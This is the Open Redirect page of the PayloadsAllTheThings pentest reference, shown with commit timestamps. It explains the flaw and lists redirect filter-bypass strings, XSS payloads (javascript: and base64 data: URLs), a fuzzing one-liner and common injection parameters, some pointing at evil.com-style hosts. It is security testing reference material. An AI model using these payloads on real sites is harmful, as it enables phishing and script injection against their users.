PayloadsAllTheThings/Open Redirect/README.md

190 lines
5.8 KiB
Markdown
Raw Normal View History

2016-10-18 08:41:18 +00:00
# Open URL Redirection
2018-08-12 21:30:22 +00:00
> Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the applications access control check and then forward the attacker to privileged functions that they would normally not be able to access.
2016-10-18 08:01:56 +00:00
2018-12-29 12:05:29 +00:00
## Summary
- [Exploitation](#exploitation)
- [HTTP Redirection Status Code - 3xx](#http-redirection-status-code---3xx)
- [Fuzzing](#fuzzing)
- [Filter Bypass](#filter-bypass)
- [Common injection parameters](#common-injection-parameters)
- [References](#references)
## Exploitation
Lets say theres a `well known` website - https://famous-website.tld/. And let's assume that there's a link like :
```powershell
https://famous-website.tld/signup?redirectUrl=https://famous-website.tld/account
```
After signing up you get redirected to your account, this redirection is specified by the `redirectUrl` parameter in the URL.
What happens if we change the `famous-website.tld/account` to `evil-website.tld`?
```powershell
2018-12-29 12:05:29 +00:00
https://famous-website.tld/signup?redirectUrl=https://evil-website.tld/account
```
By visiting this url, if we get redirected to `evil-website.tld` after the signup, we have an Open Redirect vulnerability. This can be abused by an attacker to display a phishing page asking you to enter your credentials.
## HTTP Redirection Status Code - 3xx
- [300 Multiple Choices](https://httpstatuses.com/300)
- [301 Moved Permanently](https://httpstatuses.com/301)
- [302 Found](https://httpstatuses.com/302)
- [303 See Other](https://httpstatuses.com/303)
- [304 Not Modified](https://httpstatuses.com/304)
- [305 Use Proxy](https://httpstatuses.com/305)
- [307 Temporary Redirect](https://httpstatuses.com/307)
- [308 Permanent Redirect](https://httpstatuses.com/308)
2017-07-06 19:02:19 +00:00
## Fuzzing
2018-08-12 21:30:22 +00:00
2017-07-06 19:02:19 +00:00
Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case
To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your test case URL.
2018-08-12 21:30:22 +00:00
```powershell
2017-07-06 19:02:19 +00:00
WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
```
2018-12-29 12:05:29 +00:00
## Filter Bypass
2018-08-12 21:30:22 +00:00
Using a whitelisted domain or keyword
2018-08-12 21:30:22 +00:00
```powershell
www.whitelisted.com.evil.com redirect to evil.com
```
2016-10-18 08:01:56 +00:00
2016-10-18 08:41:18 +00:00
Using CRLF to bypass "javascript" blacklisted keyword
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
java%0d%0ascript%0d%0a:alert(0)
2016-10-18 08:01:56 +00:00
```
2021-10-01 08:05:33 +00:00
Using "//" & "////" to bypass "http" blacklisted keyword
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
//google.com
2021-10-01 08:05:33 +00:00
////google.com
2016-10-18 08:41:18 +00:00
```
Using "https:" to bypass "//" blacklisted keyword
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
https:google.com
```
Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
\/\/google.com/
2017-07-06 19:02:19 +00:00
/\/google.com/
2016-10-18 08:41:18 +00:00
```
Using "%E3%80%82" to bypass "." blacklisted character
2018-08-12 21:30:22 +00:00
```powershell
/?redir=google。com
2016-10-18 08:41:18 +00:00
//google%E3%80%82com
```
Using null byte "%00" to bypass blacklist filter
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
//google%00.com
```
Using parameter pollution
```powershell
?next=whitelisted.com&next=google.com
```
2016-10-18 08:41:18 +00:00
Using "@" character, browser will redirect to anything after the "@"
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
http://www.theirsite.com@yoursite.com/
```
Creating folder as their domain
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
```
2020-11-26 15:43:10 +00:00
Using "?" characted, browser will translate it to "/?"
```powershell
http://www.yoursite.com?http://www.theirsite.com/
http://www.yoursite.com?folder/www.folder.com
```
Host/Split Unicode Normalization
```powershell
https://evil.c℀.example.com . ---> https://evil.ca/c.example.com
http://a.comX.b.com
```
2016-10-18 08:41:18 +00:00
XSS from Open URL - If it's in a JS variable
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
";alert(0);//
```
XSS from data:// wrapper
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
```
XSS from javascript:// wrapper
2018-08-12 21:30:22 +00:00
```powershell
2016-10-18 08:41:18 +00:00
http://www.example.com/redirect.php?url=javascript:prompt(1)
```
## Common injection parameters
```powershell
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
```
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2016-10-18 08:41:18 +00:00
* filedescriptor
* [You do not need to run 80 reconnaissance tools to get access to user accounts - @stefanocoding](https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781)
2018-08-12 21:30:22 +00:00
* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
2017-07-06 19:02:19 +00:00
* [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
* [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
* [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/)
* [Host/Split
Exploitable Antipatterns in Unicode Normalization - BlackHat US 2019](https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf)